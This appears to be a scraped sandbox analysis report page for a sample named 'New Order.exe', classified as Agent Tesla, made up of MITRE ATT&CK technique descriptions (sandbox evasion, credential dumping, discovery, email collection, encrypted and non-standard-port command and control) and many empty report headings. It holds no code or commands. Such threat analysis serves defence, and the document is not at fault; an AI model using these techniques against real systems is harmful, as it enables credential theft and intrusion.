Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report New Order.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre